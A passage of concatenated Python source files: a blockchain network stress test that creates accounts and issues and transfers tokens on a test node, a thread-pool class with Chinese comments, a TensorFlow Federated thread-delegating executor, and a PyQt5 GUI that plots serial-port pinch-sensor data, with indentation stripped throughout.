speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, ETAio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, ETAio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, ETAio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="ETAio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission ETAio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
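        # Pacing sketch: e.g. with speeds[cmdInd]=100 and sec=10, total=1000 transfers
        # are issued by nthreads=100 threads over cycle=10 rounds, and delay=1.0s is the
        # minimum wall-clock time per round, keeping the overall rate near 100 tx/s.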
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
StopEvent = object()
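# Hedged usage sketch (not part of the original file): tasks are submitted with run()
# and worker threads are created lazily up to max_num; close() lets queued tasks finish
# before stopping workers, while terminate() abandons the remaining queue.
#
#   pool = ThreadPool(10)
#   pool.run(func=print, args=("hello",), callback=None)
#   pool.close()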
class ThreadPool(object):
def __init__(self, max_num):
        self.q = queue.Queue()  # queue holding pending tasks
        self.max_num = max_num  # maximum number of concurrently running threads
        self.terminal = False  # when True, terminate all threads and stop taking new tasks
        self.generate_list = []  # threads that have been created
        self.free_list = []  # threads that are currently idle
        # self.run_sum_time = 0
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #无空闲线程和不超过最大线程数
self.generate_thread() # 创建线程
w = (func, args, callback,)#保存参数为元组
self.q.put(w)#添加到任务队列
# self.run_sum_time+=1
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
current_thread = threading.currentThread#获取当前线程对象
self.generate_list.append(current_thread)#添加到已创建线程里
event = self.q.get() #获取任务
while event != StopEvent: #如果不为停止信号
func, arguments, callback = event#分别取值,
try:
result = func(*arguments) #运行函数,把结果赋值给result
status = True #运行结果是否正常
except Exception as e:
status = False #不正常
result = e #结果为错误信息
# print(e)
if callback is not None: # 是否有回调函数
try:
callback(status, result) #执行回调函数
except Exception as e:
print("回调函数出错:"+str(e))
if self.terminal: # 默认为False ,如果调用terminal方法
event = StopEvent #停止信号
else:
# self.free_list.append(current_thread) #执行完毕任务,添加到闲置列表
# event = self.q.get() #获取任务
# self.free_list.remove(current_thread) #获取到任务之后,从闲置里删除
with self.worker_state(self.free_list,current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) #如果收到终止信号,就从已创建的列表删除
    def close(self):  # stop the worker threads once all queued tasks are done
        num = len(self.generate_list)  # number of threads that have been created
        while num:
            self.q.put(StopEvent)  # enqueue one stop signal per created thread
            num -= 1
    # terminate the threads (and drop whatever is left in the queue)
    def terminate(self):
        self.terminal = True  # tell workers to stop after their current task
        while self.generate_list:  # while created threads are still alive
            self.q.put(StopEvent)  # keep sending stop signals
        self.q.queue.clear()  # drop remaining tasks (Queue.empty() only checks emptiness, so clear the deque directly)
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
|
thread_delegating_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A concurrent executor that does work asynchronously in multiple threads."""
import asyncio
import functools
import threading
import weakref
import absl.logging as logging
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.impl.executors import executor_base
class ThreadDelegatingExecutor(executor_base.Executor):
"""The concurrent executor delegates work to a separate thread.
This executor only handles threading. It delegates all execution to an
underlying pool of target executors.
"""
# TODO(b/134543154): Upgrade this to a threadpool with multiple workers,
# possibly one that could be shared among multiple of these executors.
def __init__(self, target_executor):
"""Creates a concurrent executor backed by a target executor.
Args:
target_executor: The executor that does all the work.
"""
py_typecheck.check_type(target_executor, executor_base.Executor)
self._target_executor = target_executor
self._event_loop = asyncio.new_event_loop()
self._event_loop.set_task_factory(
tracing.propagate_trace_context_task_factory)
def run_loop(loop):
loop.run_forever()
loop.close()
self._thread = threading.Thread(
target=functools.partial(run_loop, self._event_loop), daemon=True)
self._thread.start()
def finalizer(loop, thread):
logging.debug('Finalizing, joining thread.')
loop.call_soon_threadsafe(loop.stop)
thread.join()
logging.debug('Thread joined.')
weakref.finalize(self, finalizer, self._event_loop, self._thread)
def close(self):
# Close does not clean up the event loop or thread.
    # Using the executor again after cleanup used to lazily re-initialize the
# event loop, but this resulted in bugs related to the persistence of values
# associated with the old event loop ("futures are tied to different event
# loops"). See the closed bug b/148288711 for more information.
self._target_executor.close()
def _delegate(self, coro):
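    # Schedules the coroutine on the private event loop running in self._thread and
    # wraps the resulting concurrent.futures.Future so callers can await it from
    # their own event loop.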
return asyncio.wrap_future(
tracing.run_coroutine_threadsafe_in_task_trace_context(
coro, self._event_loop))
@tracing.trace
async def create_value(self, value, type_spec=None):
return await self._delegate(
self._target_executor.create_value(value, type_spec))
@tracing.trace
async def create_call(self, comp, arg=None):
return await self._delegate(self._target_executor.create_call(comp, arg))
@tracing.trace
async def create_tuple(self, elements):
return await self._delegate(self._target_executor.create_tuple(elements))
@tracing.trace
async def create_selection(self, source, index=None, name=None):
return await self._delegate(
self._target_executor.create_selection(source, index=index, name=name))
|
pinchsensor_3_20180213.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
import pyqtgraph as pg
import time
import datetime
import serial
import numpy as np
import threading
import os
import configparser
default_time = 5 # 3 <= default_time <= 20
default_ymin = 2.0
default_ymax = 3.5
default_port = 'COM3'
default_baudrate = 2000000
config = configparser.ConfigParser()
if config.read('ps_config.ini'):
default_time = int(config['DEFAULT']['default_time'])
default_ymin = float(config['DEFAULT']['default_ymin'])
default_ymax = float(config['DEFAULT']['default_ymax'])
default_port = str(config['DEFAULT']['default_port'])
default_baudrate = int(config['DEFAULT']['default_baudrate'])
sample_size = default_time * 164 # 164 samples ~= 1 sec on plot
time_buffer = []
voltage_buffer = []
trigger_buffer = []
full_recordings = []
last_triggers = []
date = str(datetime.datetime.now())
ser = serial.Serial(timeout=3000)
ser.baudrate = default_baudrate
ser.port = default_port
stop_plot = True
testing = 0
# 0 -> not testing
# 1 -> test start
# 2 -> test running
# 3 -> test stop
rescaleX = False
current_recording = 0
current_test = 0
timeout_count = 0
timeout_limit = 50
def write_serial(command):
global stop_plot
try:
if command == "start_plot":
command_string = 'p' * 50
ser.write(command_string.encode())
ser.flushInput()
threading.Thread(target=get_data).start()
if command == "on/stop_plot":
command_string = 's' * 50
ser.write(command_string.encode())
except (OSError, serial.SerialException):
stop_plot = True
ui.message_box("communication_error", '')
def com_ports():
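    # Probe COM1..COM256 by attempting to open each port; any port that opens (and
    # closes) without error is reported as available.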
result = []
ports = ['COM%s' % (i + 1) for i in range(256)]
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def get_data():
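    # Reader thread: each serial line is expected to be "millis,adc,trigger"; the time
    # is converted to seconds and the 10-bit ADC value is scaled to 0-5 V before being
    # appended to the rolling plot buffers and the full recording.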
global sample_size, stop_plot, time_buffer, voltage_buffer, current_recording, trigger_buffer
global testing, rescaleX, timeout_count
full_recordings.append([])
full_recordings[current_recording].extend(([], [], [], [], False))
full_recordings[current_recording][3].append(str(datetime.datetime.now()))
voltage_buffer = [0 for x in range(sample_size)]
time_buffer = [0 for x in range(sample_size)]
trigger_buffer = [0 for x in range(sample_size)]
while 1:
if stop_plot:
current_recording += 1
break
try:
val = ser.readline()
timeout_count = 0
val = val[:-2].decode('utf-8').split(',')
if len(val) == 3 and val[0] and val[1] and val[2]:
if len(voltage_buffer) > sample_size:
for i in range(len(voltage_buffer)-sample_size):
voltage_buffer.pop(0)
time_buffer.pop(0)
trigger_buffer.pop(0)
rescaleX = True
time_sample = int(val[0]) / 1000.
voltage_sample = int(val[1]) * 5. / 1023.
trigger_sample = int(val[2])
if trigger_sample:
if testing == 0:
testing = 1
else:
if testing == 2:
testing = 3
time_buffer.append(time_sample)
voltage_buffer.append(voltage_sample)
trigger_buffer.append(trigger_sample)
full_recordings[current_recording][0].append(time_sample)
full_recordings[current_recording][1].append(voltage_sample)
full_recordings[current_recording][2].append(trigger_sample)
except (OSError, serial.SerialException):
timeout_count += 1
if timeout_count >= timeout_limit:
stop_plot = True
ui.sudden_disconnect.signal.emit()
class Ui_pinchSensorUI(object):
def __init__(self, parent=None):
super(Ui_pinchSensorUI, self).__init__()
pinchSensorUI.setObjectName("pinchSensorUI")
pinchSensorUI.setFixedSize(1060, 660)
pinchSensorUI.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowCloseButtonHint)
pinchSensorUI.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
pinchSensorUI.setWindowFilePath("")
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', '000')
self.sudden_disconnect = SuddenDisconnect()
self.sudden_disconnect.signal.connect(lambda: self.message_box("communication_error", ''))
# Main Window
self.centralWidget = QtWidgets.QStackedWidget()
self.centralWidget.setFrameRect(QtCore.QRect(0, 0, 450, 475))
self.centralWidget.setObjectName("centralWidget")
self.graph_widget = GraphWidget(self)
self.graph_widget.plotView.setYRange(default_ymin, default_ymax)
self.graph_widget.plotView.setLimits(xMin=0, minXRange=1.1*default_time,
maxXRange=1.1*default_time)
self.graph_widget.plotView.setInteractive(False)
self.plotItem = self.graph_widget.plotView.getPlotItem()
self.plotItem.hideButtons()
self.centralWidget.addWidget(self.graph_widget)
self.buttonPlot = QtWidgets.QPushButton(self.centralWidget)
self.buttonPlot.setGeometry(QtCore.QRect(880, 40, 161, 71))
self.buttonPlot.setObjectName("buttonPlot")
self.buttonPlot.setDisabled(True)
self.buttonSaveCurrent = QtWidgets.QPushButton(self.centralWidget)
self.buttonSaveCurrent.setEnabled(False)
self.buttonSaveCurrent.setGeometry(QtCore.QRect(880, 480, 161, 31))
self.buttonSaveCurrent.setObjectName("buttonSaveCurrent")
self.buttonSaveCurrent.clicked.connect(self.file_save_current)
self.buttonSaveAll = QtWidgets.QPushButton(self.centralWidget)
self.buttonSaveAll.setEnabled(False)
self.buttonSaveAll.setGeometry(QtCore.QRect(880, 550, 161, 31))
self.buttonSaveAll.setObjectName("buttonSaveAll")
self.buttonSaveAll.clicked.connect(self.file_save_all)
self.labelYUpper = QtWidgets.QLabel(self.centralWidget)
self.labelYUpper.setGeometry(QtCore.QRect(960, 140, 71, 21))
self.labelYUpper.setObjectName("labelYUpper")
self.labelYLower = QtWidgets.QLabel(self.centralWidget)
self.labelYLower.setGeometry(QtCore.QRect(960, 170, 71, 21))
self.labelYLower.setObjectName("labelYLower")
self.labelAdjustYAxis = QtWidgets.QLabel(self.centralWidget)
self.labelAdjustYAxis.setGeometry(QtCore.QRect(930, 120, 71, 16))
self.labelAdjustYAxis.setObjectName("labelAdjustYAxis")
self.spinYUpper = QtWidgets.QDoubleSpinBox(self.centralWidget)
self.spinYUpper.setGeometry(QtCore.QRect(901, 140, 51, 22))
self.spinYUpper.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.spinYUpper.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue)
self.spinYUpper.setKeyboardTracking(True)
self.spinYUpper.setProperty("showGroupSeparator", False)
self.spinYUpper.setDecimals(2)
self.spinYUpper.setMinimum(0.0)
self.spinYUpper.setMaximum(5.0)
self.spinYUpper.setSingleStep(0.25)
self.spinYUpper.setProperty("value", default_ymax)
self.spinYUpper.setObjectName("spinYUpper")
self.spinYLower = QtWidgets.QDoubleSpinBox(self.centralWidget)
self.spinYLower.setGeometry(QtCore.QRect(901, 170, 51, 22))
self.spinYLower.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.spinYLower.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue)
self.spinYLower.setDecimals(2)
self.spinYLower.setMaximum(5.0)
self.spinYLower.setSingleStep(0.25)
self.spinYLower.setProperty("value", default_ymin)
self.spinYLower.setObjectName("spinYLower")
self.spinX = QtWidgets.QSpinBox(self.centralWidget)
self.spinX.setGeometry(QtCore.QRect(900, 200, 51, 22))
self.spinX.setValue(default_time)
self.spinX.setMinimum(3)
self.spinX.setMaximum(20)
self.labelX = QtWidgets.QLabel(self.centralWidget)
self.labelX.setGeometry(QtCore.QRect(958, 200, 72, 21))
self.labelX.setText("Time Range (X)")
self.lcdCurrentSession = QtWidgets.QLCDNumber(self.centralWidget)
self.lcdCurrentSession.setGeometry(QtCore.QRect(1010, 450, 31, 23))
self.lcdCurrentSession.setDigitCount(3)
self.lcdCurrentSession.setFrameStyle(0)
self.lcdCurrentSession.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdCurrentSession.setObjectName("lcdCurrentSession")
self.lcdCurrentSession.display('00')
self.labelCurrentSession = QtWidgets.QLabel(self.centralWidget)
self.labelCurrentSession.setGeometry(QtCore.QRect(930, 455, 91, 16))
self.labelCurrentSession.setObjectName("labelCurrentSession")
self.lineFileName = LineEdit(self.centralWidget)
self.lineFileName.setGeometry(QtCore.QRect(880, 520, 161, 20))
self.lineFileName.setObjectName("lineFileName")
self.lineFileName.setText("pinchsensor_recording.txt")
self.lineFileName.textChanged.connect(self.update_file_name)
self.labelFileNameFirst = QtWidgets.QLabel(self.centralWidget)
self.labelFileNameFirst.setGeometry(QtCore.QRect(880, 590, 161, 16))
self.labelFileNameFirst.setText("pinchsensor_recording_1.txt")
self.menuBar = QtWidgets.QMenuBar(pinchSensorUI)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 1056, 21))
self.menuBar.setObjectName("menuBar")
self.labelTestTimes = QtWidgets.QLabel(self.centralWidget)
self.labelTestTimes.setGeometry(QtCore.QRect(875, 230, 171, 16))
self.labelTestTimes.setText("Tests performed (current session):")
self.treeTestTimes = QtWidgets.QTreeWidget(self.centralWidget)
self.treeTestTimes.setGeometry(QtCore.QRect(875, 250, 171, 191))
self.treeTestTimes.headerItem().setText(0, "#")
self.treeTestTimes.headerItem().setText(1, "Start")
self.treeTestTimes.headerItem().setText(2, "Finish")
self.treeTestTimes.headerItem().setText(3, "Elapsed")
self.treeTestTimes.header().resizeSection(0, 20)
self.treeTestTimes.header().resizeSection(1, 45)
self.treeTestTimes.header().resizeSection(2, 45)
self.treeTestTimes.header().resizeSection(3, 40)
self.treeTestTimes.setRootIsDecorated(False)
self.lcdTime = QtWidgets.QLCDNumber(self.centralWidget)
self.lcdTime.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdTime.setFrameStyle(0)
self.lcdTime.setDigitCount(5)
self.lcdTime.setGeometry(QtCore.QRect(770, 10, 120, 23))
self.buttonConnect = QtWidgets.QPushButton(self.centralWidget)
self.buttonConnect.setGeometry(QtCore.QRect(880, 10, 161, 25))
self.buttonConnect.setText("Connect")
self.buttonConnect.clicked.connect(self.start_connection)
# COM Config Window
self.comConfigWindow = QtGui.QMainWindow()
self.comConfigWindow.setWindowTitle("COM configuration")
self.comConfigWindow.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowCloseButtonHint)
self.comConfigWindow.setFixedSize(240, 170)
self.buttonCancel = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonCancel.setText("Cancel")
self.buttonCancel.setGeometry(QtCore.QRect(130, 120, 75, 23))
self.buttonCancel.clicked.connect(self.comConfigWindow.close)
self.buttonConfirm = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonConfirm.setText("Confirm")
self.buttonConfirm.setGeometry(QtCore.QRect(40, 120, 75, 23))
self.buttonConfirm.clicked.connect(self.set_com)
self.threadCOM = COMThread()
self.buttonRefresh = QtWidgets.QPushButton(self.comConfigWindow)
self.buttonRefresh.setText("Refresh")
self.buttonRefresh.setGeometry(QtCore.QRect(150, 30, 75, 23))
self.buttonRefresh.clicked.connect(self.threadCOM.start)
self.comboCOM = QtWidgets.QComboBox(self.comConfigWindow)
self.comboCOM.setGeometry(QtCore.QRect(20, 30, 111, 21))
self.comboBaud = QtWidgets.QComboBox(self.comConfigWindow)
self.comboBaud.setGeometry(QtCore.QRect(20, 80, 111, 21))
for baudrate in [300, 1200, 2400, 4800, 9600, 19200, 38400, 57600, 74880,
115200, 230400, 250000, 500000, 1000000, 2000000]:
self.comboBaud.addItem(str(baudrate))
self.comboBaud.setCurrentText("2000000")
self.labelCOM = QtWidgets.QLabel(self.comConfigWindow)
self.labelCOM.setGeometry(QtCore.QRect(20, 10, 47, 13))
self.labelCOM.setText("COM port")
self.labelBaud = QtWidgets.QLabel(self.comConfigWindow)
self.labelBaud.setGeometry(QtCore.QRect(20, 60, 47, 13))
self.labelBaud.setText("Baudrate")
# Message Window
self.msgBox = QtWidgets.QMessageBox()
# Plotting
self.curve = self.plotItem.plot(time_buffer, voltage_buffer)
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
self.test_curve = self.plotItem.plot()
self.plot_timer = QtCore.QTimer()
self.plot_timer.timeout.connect(self.updater)
self.buttonPlot.clicked.connect(self.plot)
self.spinYLower.valueChanged.connect(self.update_graph)
self.spinYUpper.valueChanged.connect(self.update_graph)
self.spinX.valueChanged.connect(self.update_graph)
# Final Window Config
pinchSensorUI.setCentralWidget(self.centralWidget)
pinchSensorUI.setMenuBar(self.menuBar)
optionsMenu = self.menuBar.addMenu('&Options')
self.actionCOMConfig = optionsMenu.addAction("&Configure COM port")
self.actionCOMConfig.triggered.connect(self.com_config)
self.actionCOMReset = optionsMenu.addAction("&Disconnect COM port")
self.actionCOMReset.triggered.connect(self.disconnect)
self.actionCOMReset.setDisabled(True)
self.retranslateUi(pinchSensorUI)
QtCore.QMetaObject.connectSlotsByName(pinchSensorUI)
def retranslateUi(self, pinchSensorUI):
_translate = QtCore.QCoreApplication.translate
pinchSensorUI.setWindowTitle(_translate("pinchSensorUI", "Pinchsensor V3"))
self.buttonPlot.setText(_translate("pinchSensorUI", "Start Plot"))
self.buttonSaveCurrent.setText(_translate("pinchSensorUI", "Save Current Session"))
self.buttonSaveAll.setText(_translate("pinchSensorUI", "Save All Sessions"))
self.labelYUpper.setText(_translate("pinchSensorUI", "Upper limit (Y)"))
self.labelYLower.setText(_translate("pinchSensorUI", "Lower limit (Y)"))
self.labelAdjustYAxis.setText(_translate("pinchSensorUI", "Adjust axes"))
self.labelCurrentSession.setText(_translate("pinchSensorUI", "Current Session:"))
# self.lineFileName.setText(_translate("pinchSensorUI", "current_session.txt"))
def message_box(self, message, ex):
if message == "disconnected":
self.msgBox.setText("Successfully disconnected from device.")
self.msgBox.setIcon(1) # information
self.msgBox.setWindowTitle("Disconnected")
if message == "connected":
self.msgBox.setText("Successfully connected to device.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Connected")
self.actionCOMReset.setEnabled(True)
if message == "connection_error":
self.msgBox.setText("Error trying to connect to device.\nCheck connection and try again.")
self.msgBox.setIcon(2) # warning
self.msgBox.setWindowTitle("Connection error")
if message == "communication_error":
self.msgBox.setText("Error communicating to device.\nPlease, try reconnecting.")
self.msgBox.setWindowTitle("Communication error")
self.msgBox.setIcon(3) # critical
self.connection_refresh()
time.sleep(1)
if message == "file_error":
self.msgBox.setText("Error saving %s." % ex)
self.msgBox.setIcon(2) # warning
self.msgBox.setWindowTitle("Save error")
if message == "file_saved":
self.msgBox.setText("%s saved successfully." % ex)
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("File saved")
if message == "files_saved":
self.msgBox.setText("All files for %s were saved." % ex)
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Files saved")
if message == "file_saved_already":
self.msgBox.setText("Current recording has already been saved.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("File already saved")
if message == "files_saved_already":
self.msgBox.setText("All recordings have already been saved.")
self.msgBox.setIcon(1)
self.msgBox.setWindowTitle("Files already saved")
self.msgBox.exec_()
def com_config(self):
self.refresh_com()
self.comConfigWindow.show()
def refresh_com(self):
self.comboCOM.clear()
self.comboCOM.setDisabled(True)
self.comboCOM.addItem("Finding ports...")
self.refresh_()
def refresh_(self):
result = com_ports()
self.comboCOM.clear()
if result:
self.buttonConfirm.setEnabled(True)
self.comboCOM.setEnabled(True)
for port in result:
self.comboCOM.addItem(port)
self.comboCOM.setCurrentText(port)
else:
self.comboCOM.addItem("Ports not found")
self.comboCOM.setDisabled(True)
self.buttonConfirm.setDisabled(True)
def set_com(self):
ser.baudrate = int(self.comboBaud.currentText())
ser.port = self.comboCOM.currentText()
self.comConfigWindow.close()
def start_connection(self):
self.buttonConnect.setDisabled(True)
self.buttonConnect.setText("Connecting")
self.count = 0
self.connect_timer = QtCore.QTimer()
self.connect_timer.timeout.connect(self.attempt_connection)
self.connect_timer.start(1000)
def attempt_connection(self):
self.buttonConnect.setText("Connecting" + (self.count + 1) * ".")
if not ser.is_open:
try:
ser.open()
time.sleep(3)
try:
a = ser.read_all().decode()
if 'w' in a:
self.buttonConnect.setText("Connected")
self.buttonPlot.setEnabled(True)
self.message_box("connected", '')
self.actionCOMReset.setEnabled(True)
threading.Thread(target=write_serial, args=["on/stop_plot"]).start()
self.actionCOMConfig.setDisabled(True)
self.connect_timer.stop()
return
else:
self.count += 1
ser.close()
except (OSError, serial.SerialException):
pass
except (OSError, serial.SerialException):
self.count += 1
if self.count == 4:
self.buttonConnect.setText("Connect")
self.buttonConnect.setEnabled(True)
self.connect_timer.stop()
self.message_box("connection_error", '')
def disconnect(self):
global stop_plot
stop_plot = True
if ser.is_open:
ser.close()
ser.open()
ser.close()
self.connection_refresh()
self.message_box("disconnected", '')
def connection_refresh(self):
if ser.is_open:
ser.close()
if current_recording > 0:
self.buttonSaveCurrent.setEnabled(True)
if current_recording > 1:
self.buttonSaveAll.setEnabled(True)
self.actionCOMReset.setDisabled(True)
self.actionCOMConfig.setEnabled(True)
self.buttonPlot.setText("Start Plot")
self.buttonPlot.setDisabled(True)
self.buttonConnect.setEnabled(True)
self.buttonConnect.setText("Connect")
def update_graph(self):
global sample_size
sample_size = 164 * self.spinX.value()
self.spinYUpper.setMinimum(self.spinYLower.value() + 0.5)
self.spinYLower.setMaximum(self.spinYUpper.value() - 0.5)
self.graph_widget.plotView.setYRange(self.spinYLower.value(), self.spinYUpper.value())
self.graph_widget.plotView.setLimits(xMin=0, maxXRange=self.spinX.value())
if time_buffer:
self.graph_widget.plotView.setXRange(time_buffer[-1]-self.spinX.value(), time_buffer[-1])
else:
self.graph_widget.plotView.setXRange(0, self.spinX.value())
def plot(self):
try:
ser.inWaiting()
global stop_plot, current_recording, current_test
if not stop_plot:
stop_plot = True
self.buttonPlot.setText("Start Plot")
threading.Thread(target=write_serial, args=["on/stop_plot"]).start()
self.buttonPlot.setDisabled(True)
QtCore.QTimer.singleShot(500, self.enable_plot_button)
self.buttonSaveCurrent.setEnabled(True)
if current_recording > 0:
self.buttonSaveAll.setEnabled(True)
else:
stop_plot = False
self.lcdCurrentSession.display('%.2d' % (current_recording + 1))
self.plotItem.clear()
self.curve = self.plotItem.plot()
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
current_test = 0
self.treeTestTimes.clear()
self.buttonPlot.setText("Stop Plot")
self.buttonPlot.setDisabled(True)
QtCore.QTimer.singleShot(500, self.enable_plot_button)
self.buttonSaveAll.setDisabled(True)
self.buttonSaveCurrent.setDisabled(True)
threading.Thread(target=write_serial, args=["start_plot"]).start()
self.plot_timer.start()
except (OSError, serial.SerialException):
self.message_box("communication_error", '')
def enable_plot_button(self):
self.buttonPlot.setEnabled(True)
def updater(self):
global testing, rescaleX, last_triggers, time_buffer, current_test
if stop_plot:
testing = 0
last_triggers.clear()
self.plot_timer.stop()
return
if rescaleX:
self.graph_widget.plotView.setXRange(time_buffer[-1]-self.spinX.value(),
time_buffer[-1] + 0.1 * self.spinX.value())
self.curve.setData(time_buffer, voltage_buffer)
if time_buffer:
self.lcdTime.display('%.1f' % time_buffer[-1])
else:
self.clear_plot()
if len(last_triggers) > 6:
last_triggers.pop(0)
last_triggers.pop(0)
self.clear_plot()
if testing == 1:
current_test += 1
last_triggers.append(time_buffer[-1])
tree_item = [str(current_test), '%.3f' % time_buffer[-1], '-', '-']
tree_item = QtWidgets.QTreeWidgetItem(tree_item)
self.treeTestTimes.addTopLevelItem(tree_item)
self.treeTestTimes.scrollToBottom()
self.plotItem.addLine(x=time_buffer[-1]).setPen(pg.mkPen(color=(1, 100, 32), width=5))
self.curve.setPen(pg.mkPen(color=(255, 0, 0), width=2))
testing = 2
if testing == 3:
start_time = float(self.treeTestTimes.topLevelItem(current_test-1).text(1))
end_time = time_buffer[-1]
elapsed = end_time - start_time
tree_item = [str(current_test), '%.3f' % start_time, '%.3f' % end_time, '%.3f' % elapsed]
self.treeTestTimes.takeTopLevelItem(current_test-1)
self.treeTestTimes.addTopLevelItem(QtWidgets.QTreeWidgetItem(tree_item))
last_triggers.append(time_buffer[-1])
self.plotItem.addLine(x=time_buffer[-1]).setPen(pg.mkPen(color=(200, 0, 0), width=5))
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
testing = 0
def clear_plot(self):
self.plotItem.clear()
for index, trigger in enumerate(last_triggers):
if not index % 2:
self.plotItem.addLine(x=trigger).setPen(pg.mkPen(color=(1, 100, 32), width=5))
else:
self.plotItem.addLine(x=trigger).setPen(pg.mkPen(color=(200, 0, 0), width=5))
self.curve = self.plotItem.plot()
if testing == 0 or testing == 3:
self.curve.setPen(pg.mkPen(color=(0, 0, 0), width=2))
if testing == 1 or testing == 2:
self.curve.setPen(pg.mkPen(color=(255, 0, 0), width=2))
def update_file_name(self):
if self.lineFileName.text()[-4:] == ".txt":
self.labelFileNameFirst.setText(self.lineFileName.text()[0:-4] + "_1.txt")
elif '.' not in self.lineFileName.text() and self.lineFileName.text():
self.labelFileNameFirst.setText(self.lineFileName.text() + "_1")
elif not self.lineFileName.text():
self.labelFileNameFirst.clear()
def file_save_current(self):
if full_recordings[current_recording - 1][4]:
self.message_box("file_saved_already", '')
return
name = self.lineFileName.text()
name = QtWidgets.QFileDialog.getSaveFileName(QtWidgets.QFileDialog(), caption="Save current recording",
directory=os.path.join(os.getcwd(), name),
filter="Text files (*.txt)")
if name[0]:
self.lineFileName.setText(os.path.split(name[0])[1])
self.update_file_name()
name = self.lineFileName.text()
try:
file = open(name, 'w')
date_time = full_recordings[current_recording-1][3]
file.write("#Data collection started on %s\n" % date_time[0][:-7])
file.write("#[Time] [Voltage] [Trigger]\n")
for i in range(len(full_recordings[current_recording-1][0])):
time_sample = full_recordings[current_recording-1][0][i]
voltage_sample = full_recordings[current_recording-1][1][i]
trigger_sample = full_recordings[current_recording-1][2][i]
file.write("%.3f %.3f %d\n" % (time_sample, voltage_sample, trigger_sample))
